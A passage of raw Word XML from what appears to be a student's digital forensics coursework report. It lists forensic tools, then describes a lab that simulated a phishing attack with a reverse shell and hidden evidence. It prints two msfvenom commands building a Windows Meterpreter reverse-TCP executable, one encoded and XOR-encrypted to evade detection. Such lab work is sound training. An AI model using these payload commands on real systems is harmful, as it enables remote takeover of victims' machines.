          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v1owi4ekmq8c" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Elcomsoft Cloud eXplorer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracts and analyzes user data from various cloud services.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cm0clqd2g2jh" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database Forensics</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i4u0e4r8db4r" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite Forensic Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Designed to analyze and report on data stored in SQLite database files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y9fazw2kdlw2" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Magnet AXIOM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Can be used for database analysis, offering advanced data carving and decoding features.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ebqjcqy4ve4o" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Email Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_192kpfwsz8u1" w:id="60"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MailXaminer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Specialized in email analysis, supporting various email formats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8cqpvnumdihh" w:id="61"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Sleuth Kit (+Autopsy)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Autopsy is an open-source user-friendly, extensible digital forensics tool known for its intuitive design and easy installation. Key features include timeline analysis, hash filtering, keyword search, web artifact extraction, data carving, multimedia analysis, and indicators of compromise detection. It efficiently runs tasks in parallel, delivering fast results. Notably, Autopsy is free, making it a cost-effective solution in the digital forensics market. It provides core functionalities similar to other forensics tools and offers unique features like web artifact and registry analysis, which some commercial tools lack [34].</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kgfqjlpk4zqv" w:id="62"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3: Digital Forensic Investigation Simulation</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Part 1: Selecting a Theme and Collecting Data and Data Collection Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name of the file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group C - Data Collection Report.pdf</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this task, we tackled a financial crime scenario. Utilizing a virtual environment setup in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle VirtualBox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the attacker's machine and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Home as the victim's.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">The team simulated a phishing attack where the victim's wireless connection was hacked to send an email with a reverse shell payload. This allowed the attacker to remotely monitor and control the victim's activities, including unauthorized Amazon purchases. The team employed tools like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setoolkit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for malware creation and explored various evidences such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phishing emails</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Capture tool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessions, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> screenshots, each marked with specific timestamps. We also used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">steganography </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">encryption </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to conceal evidence and partitioned the hard drive for separate hosting of the Windows client and Kali Linux. The task emphasized the identification, analysis, and presentation of digital evidence in a complex cybercrime scenario.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I took the initiative to create a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shared cloud storage drive and documents</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for meeting notes to facilitate our group discussions. The files are named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Team Discussions_Meeting Notes'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Meeting Notes - 1.'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Additionally, I shared my notes, contained in a Google Colab notebook titled </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Notes.ipynb,'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the team. These notes encompass detailed information on various topics such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell, msfvenom, the Metasploit Framework, Meterpreter, Steganography, Steghide, and the Social-Engineer Toolkit (SET)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. They also include steps for hiding and unhiding files using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attrib commands</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I generated commands to create a payload that was later used in creating the evidence. However, our team decided to choose the payload that provides the most stable session. The following were the different options discussed with the team:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oukqgymsthh1" w:id="63"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Generating a Basic Payload (Windows Meterpreter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse TCP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload without encryption with .exe extension, called iambad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`msfvenom -p windows/meterpreter/reverse_tcp LHOST=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.0.14</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4455</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f exe -o /home/kali/Desktop/iambad.exe`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload with encryption with .exe extension, called /iamencrypt.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`msfvenom -p windows/meterpreter/reverse_tcp LHOST=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.0.14</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4455</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e x86/shikata_ga_nai -i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -encrypt xor -encrypt-key s3cr3tK3y -f exe -o /home/kali/Desktop/iamencrypt.exe`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Because msfvenom does not provide built-in functionality for payload decryption, I created a corresponding Python program for both encryption and decryption using XOR.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
